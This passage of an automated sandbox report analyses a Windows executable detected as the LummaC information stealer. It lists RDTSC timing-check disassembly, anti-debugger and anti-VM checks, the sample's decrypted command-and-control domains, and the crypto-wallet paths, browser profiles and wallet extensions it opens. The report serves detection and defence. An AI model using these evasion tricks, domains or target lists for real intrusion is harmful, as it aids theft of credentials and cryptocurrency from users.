              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F0C23 second address: 50F0CB6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A547B38Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b call 00007F79A547B394h 0x00000010 pushfd 0x00000011 jmp 00007F79A547B392h 0x00000016 sbb cl, FFFFFFE8h 0x00000019 jmp 00007F79A547B38Bh 0x0000001e popfd 0x0000001f pop ecx 0x00000020 jmp 00007F79A547B399h 0x00000025 popad 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a mov si, 5719h 0x0000002e pushfd 0x0000002f jmp 00007F79A547B396h 0x00000034 sub cx, E8A8h 0x00000039 jmp 00007F79A547B38Bh 0x0000003e popfd 0x0000003f popad 0x00000040 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F0CB6 second address: 50F0CFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A4C9A8F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F79A4C9A8EEh 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F79A4C9A8F7h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F0CFD second address: 50F0D03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F0D03 second address: 50F0D07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F0D07 second address: 50F0D25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F79A547B393h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F0D25 second address: 50F0D2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F0D2B second address: 50F0D2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F0D2F second address: 50F0D57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F79A4C9A8F9h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F0D57 second address: 50F0D6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A547B391h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F0DFF second address: 50F0E0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F79A4C9A8ECh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50F0E0F second address: 5100924 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ret 0x00000009 nop 0x0000000a and bl, 00000001h 0x0000000d movzx eax, bl 0x00000010 lea esp, dword ptr [ebp-0Ch] 0x00000013 pop esi 0x00000014 pop edi 0x00000015 pop ebx 0x00000016 pop ebp 0x00000017 ret 0x00000018 add esp, 04h 0x0000001b jmp dword ptr [0095A41Ch+ebx*4] 0x00000022 push edi 0x00000023 call 00007F79A54A0D87h 0x00000028 push ebp 0x00000029 push ebx 0x0000002a push edi 0x0000002b push esi 0x0000002c sub esp, 000001D0h 0x00000032 mov dword ptr [esp+000001B4h], 0095CB10h 0x0000003d mov dword ptr [esp+000001B0h], 000000D0h 0x00000048 mov dword ptr [esp], 00000000h 0x0000004f mov eax, dword ptr [009581DCh] 0x00000054 call eax 0x00000056 mov edi, edi 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007F79A547B38Ah 0x0000005f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100924 second address: 5100936 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F79A4C9A8EEh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100936 second address: 510098A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A547B38Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F79A547B396h 0x00000011 push eax 0x00000012 jmp 00007F79A547B38Bh 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F79A547B396h 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov cx, di 0x00000025 popad 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100ACD second address: 5100ADF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F79A4C9A8EEh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100ADF second address: 5100B3E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A547B38Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d mov edx, ecx 0x0000000f mov ebx, eax 0x00000011 popad 0x00000012 call 00007F7A15E10401h 0x00000017 push 75A92B70h 0x0000001c push dword ptr fs:[00000000h] 0x00000023 mov eax, dword ptr [esp+10h] 0x00000027 mov dword ptr [esp+10h], ebp 0x0000002b lea ebp, dword ptr [esp+10h] 0x0000002f sub esp, eax 0x00000031 push ebx 0x00000032 push esi 0x00000033 push edi 0x00000034 mov eax, dword ptr [75AF4538h] 0x00000039 xor dword ptr [ebp-04h], eax 0x0000003c xor eax, ebp 0x0000003e push eax 0x0000003f mov dword ptr [ebp-18h], esp 0x00000042 push dword ptr [ebp-08h] 0x00000045 mov eax, dword ptr [ebp-04h] 0x00000048 mov dword ptr [ebp-04h], FFFFFFFEh 0x0000004f mov dword ptr [ebp-08h], eax 0x00000052 lea eax, dword ptr [ebp-10h] 0x00000055 mov dword ptr fs:[00000000h], eax 0x0000005b ret 0x0000005c pushad 0x0000005d mov ax, 7F0Fh 0x00000061 popad 0x00000062 mov esi, 00000000h 0x00000067 pushad 0x00000068 call 00007F79A547B38Ch 0x0000006d pushfd 0x0000006e jmp 00007F79A547B392h 0x00000073 sub esi, 18EDF7E8h 0x00000079 jmp 00007F79A547B38Bh 0x0000007e popfd 0x0000007f pop esi 0x00000080 push eax 0x00000081 push edx 0x00000082 mov eax, edi 0x00000084 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100B3E second address: 5100B5B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [ebp-1Ch], esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F79A4C9A8EFh 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100B5B second address: 5100B5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100B5F second address: 5100B65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100B65 second address: 5100B6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100B6B second address: 5100B6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100B8D second address: 5100B91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100B91 second address: 5100B95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100B95 second address: 5100BB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 movzx esi, di 0x00000009 popad 0x0000000a je 00007F7A15DFF16Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F79A547B38Dh 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100BB6 second address: 5100BBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100BBC second address: 5100BD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F79A547B393h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100BD3 second address: 5100BD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51206E3 second address: 51206E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51206E7 second address: 51206EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51206EB second address: 51206F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51206F1 second address: 5120721 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A4C9A8F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov di, F4E4h 0x0000000f movsx edx, si 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F79A4C9A8EBh 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120721 second address: 512073E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 119CB10Ah 0x00000008 movsx edx, cx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov edx, 5E4B70BAh 0x00000018 mov di, DE86h 0x0000001c popad 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 512073E second address: 5120744 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120744 second address: 5120748 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120748 second address: 512074C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 512074C second address: 5120778 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 jmp 00007F79A547B392h 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F79A547B38Eh 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120778 second address: 5120798 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 push ebx 0x00000007 pop esi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F79A4C9A8F2h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120798 second address: 512084F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, 16h 0x00000005 mov eax, 469B0CC9h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov esi, dword ptr [ebp+0Ch] 0x00000010 pushad 0x00000011 mov si, 8C01h 0x00000015 call 00007F79A547B38Eh 0x0000001a mov ah, 77h 0x0000001c pop ebx 0x0000001d popad 0x0000001e test esi, esi 0x00000020 pushad 0x00000021 mov bx, cx 0x00000024 push esi 0x00000025 pushfd 0x00000026 jmp 00007F79A547B38Bh 0x0000002b sub si, 6DDEh 0x00000030 jmp 00007F79A547B399h 0x00000035 popfd 0x00000036 pop eax 0x00000037 popad 0x00000038 je 00007F7A15DE8F4Ah 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 pushfd 0x00000042 jmp 00007F79A547B398h 0x00000047 jmp 00007F79A547B395h 0x0000004c popfd 0x0000004d pushfd 0x0000004e jmp 00007F79A547B390h 0x00000053 sub ecx, 6D0D3768h 0x00000059 jmp 00007F79A547B38Bh 0x0000005e popfd 0x0000005f popad 0x00000060 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 512084F second address: 512088F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 mov di, 1ED6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d cmp dword ptr [75AF459Ch], 05h 0x00000014 pushad 0x00000015 jmp 00007F79A4C9A8F3h 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F79A4C9A8F6h 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120901 second address: 5120907 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Tries to evade debugger and weak emulator (self modifying code)
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 96EB8E instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B17A54 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B213DD instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: BA648F instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 3664Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 5516Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: file.exe, 00000000.00000002.2170536347.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
              Source: file.exe, 00000000.00000003.2090048409.0000000005B35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
              Source: file.exe, 00000000.00000002.2171310679.0000000001141000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
              Source: file.exe, 00000000.00000002.2171310679.00000000010CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
              Source: file.exe, 00000000.00000003.2090048409.0000000005B35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
              Source: file.exe, 00000000.00000002.2171310679.0000000001120000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
              Source: file.exe, 00000000.00000002.2170536347.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
              Source: file.exe, 00000000.00000003.2090048409.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (window names)
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              LummaC encrypted strings found
              Source: file.exe, 00000000.00000003.2048746215.0000000004F60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: scriptyprefej.store
              Source: file.exe, 00000000.00000003.2048746215.0000000004F60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: navygenerayk.store
              Source: file.exe, 00000000.00000003.2048746215.0000000004F60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: founpiuer.store
              Source: file.exe, 00000000.00000003.2048746215.0000000004F60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: necklacedmny.store
              Source: file.exe, 00000000.00000003.2048746215.0000000004F60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: thumbystriw.store
              Source: file.exe, 00000000.00000003.2048746215.0000000004F60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: fadehairucw.store
              Source: file.exe, 00000000.00000003.2048746215.0000000004F60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: crisiwarny.store
              Source: file.exe, 00000000.00000003.2048746215.0000000004F60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: presticitpo.store
              Source: file.exe, 00000000.00000002.2170781457.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: file.exe, 00000000.00000003.2140111832.00000000011AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 5800, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: file.exe, 00000000.00000003.2104689595.00000000011B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Electrum-LTC
              Source: file.exe, 00000000.00000003.2076312440.0000000001199000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ta%\\ElectronCash\\wallets","m":["*"],"z":"Walle}
              Source: file.exeString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
              Source: file.exe, 00000000.00000002.2171310679.0000000001141000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
              Source: file.exe, 00000000.00000003.2076312440.0000000001199000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ":"%appdata%\\Exodus\\exodus.wallet"
              Source: file.exeString found in binary or memory: Wallets/Exodus
              Source: file.exe, 00000000.00000003.2076312440.0000000001199000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance
              Source: file.exe, 00000000.00000003.2076312440.0000000001199000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore"],"z":"Wallets/Ethereum","d":1,"fs"
              Source: file.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: file.exeString found in binary or memory: keystore
              Source: file.exe, 00000000.00000003.2076312440.0000000001199000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ledger Live>[>>
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
